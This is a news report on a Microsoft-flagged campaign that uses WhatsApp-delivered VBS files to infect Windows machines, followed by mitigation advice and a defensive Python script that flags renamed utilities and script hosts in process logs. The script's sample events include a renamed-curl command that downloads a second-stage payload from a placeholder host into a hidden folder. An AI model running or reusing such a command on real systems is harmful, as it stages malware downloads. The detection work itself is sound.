Microsoft has warned of a new malware campaign in which attackers use WhatsApp messages to distribute malicious VBS files targeting Windows users, enabling remote access and evading detection through social engineering and legitimate tools.
Microsoft has issued a warning over a new cyberattack campaign that uses WhatsApp messages to distribute malware capable of compromising Windows computers and granting attackers long-term remote access.
The company said the activity, first observed in late February 2026, centres on malicious Visual Basic Script (VBS) files sent directly to users via the popular messaging platform.
Once opened, the files initiate a complex, multi-stage infection chain designed to evade detection while embedding the malware deeply within affected systems.
Researchers at Microsoft say it remains unclear what tactics are being used to persuade recipients to open the files, but believe the campaign relies heavily on social engineering.
“The campaign relies on a combination of social engineering and living-off-the-land techniques,” the Microsoft Defender Security Research Team said in a blog post.
Such techniques involve abusing legitimate tools already present on a system, allowing attackers to operate without introducing obvious malicious software.
In this case, hackers are disguising commonly used Windows utilities under different names to blend in with routine system activity.
Attack chain
The attack begins when a user executes a VBS file received via WhatsApp. The script then creates hidden directories within the system and installs renamed versions of legitimate tools such as curl.exe and bitsadmin.exe, making them harder for security systems to identify.
Once a foothold has been established, the malware retrieves additional payloads from well-known cloud services including AWS, Tencent Cloud and Backblaze B2.
The use of these trusted platforms enables attackers to mask malicious traffic as normal network activity.
Security experts say this approach significantly increases the likelihood of success. By relying on legitimate infrastructure and tools, the attackers can bypass conventional detection methods and remain undetected for longer periods.
Microsoft says the malware then attempts to escalate its privileges by tampering with User Account Control (UAC) settings, a key Windows security feature. It repeatedly tries to launch command-line processes with elevated permissions, modifying system registry entries in the process.
These changes are designed to weaken system defences and ensure persistence, the company said. The malware embeds mechanisms that allow it to survive system reboots and maintain control over time.
In later stages of the attack, unsigned Microsoft Installer (MSI) packages are deployed. These may include legitimate remote-access tools such as AnyDesk, which can be used by attackers to control infected machines, extract sensitive data or install further malware.
Mitigation and protection
To mitigate the threat, Microsoft has urged organisations to strengthen endpoint protections by restricting the execution of script-hosting tools such as wscript and cscript in untrusted locations.
It also recommends monitoring for unusual behaviour involving renamed system utilities.
The company further advises organisations to inspect and filter traffic to cloud platforms to detect suspicious downloads, even when originating from reputable services.
Additional recommendations include monitoring registry changes linked to persistence techniques, blocking access to known command-and-control infrastructure, and educating users about the risks of unexpected attachments.
Individuals are encouraged to exercise caution when receiving files via messaging apps, even from known contacts, and to ensure that security features such as cloud-delivered antivirus protection are enabled.
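The two monitoring recommendations above, renamed system utilities and script hosts running from untrusted locations, can be expressed as simple rules over process-creation telemetry. The following is an added example written for this article, not Microsoft's own detection logic; it assumes Sysmon Event ID 1 style fields (Image, OriginalFileName, ParentImage, CommandLine), and the sample events and the list of "untrusted" directories are constructed for illustration.

```python
import ntpath

# Utilities the campaign is reported to copy under different names.
RENAME_WATCHLIST = {"curl.exe", "bitsadmin.exe"}
# Script hosts the mitigation advice says to restrict.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed user-writable locations treated as "untrusted"; tune per environment.
UNTRUSTED_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\",
                  "\\users\\public\\", "\\programdata\\")

def classify(event: dict) -> list:
    """Return alert tags for one Sysmon Event ID 1 style process-creation record."""
    image = event.get("Image", "")
    name = ntpath.basename(image).lower()
    original = event.get("OriginalFileName", "").lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmdline = event.get("CommandLine", "").lower()
    alerts = []
    # 1. PE version info still says curl/bitsadmin, but the file name on disk differs.
    if original in RENAME_WATCHLIST and name != original:
        alerts.append("renamed-utility:%s->%s" % (original, name))
    # 2. wscript/cscript handed a script that lives in a user-writable directory.
    if name in SCRIPT_HOSTS and any(d in cmdline for d in UNTRUSTED_DIRS):
        alerts.append("script-host-untrusted-path")
    # 3. A script host launching a download utility, renamed or not.
    if parent in SCRIPT_HOSTS and (original in RENAME_WATCHLIST or name in RENAME_WATCHLIST):
        alerts.append("script-host-spawned-downloader")
    return alerts

def scan(events: list) -> dict:
    """Map event index -> alert tags for every event that triggered at least one rule."""
    return {i: a for i, e in enumerate(events) if (a := classify(e))}

# Constructed sample events (not real telemetry): a VBS run from Downloads,
# a renamed curl.exe spawned by wscript from a hidden directory, and a benign curl.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\.cache\svc.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"svc.exe -s -o C:\Users\alice\AppData\Local\Temp\.cache\s2.bin https://example.invalid/s2"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl.exe https://example.com/"},
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, tags)
```

In production the same checks map onto a SIEM query over the identical fields; OriginalFileName is the key to catching renamed binaries because the PE version resource survives a file rename.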
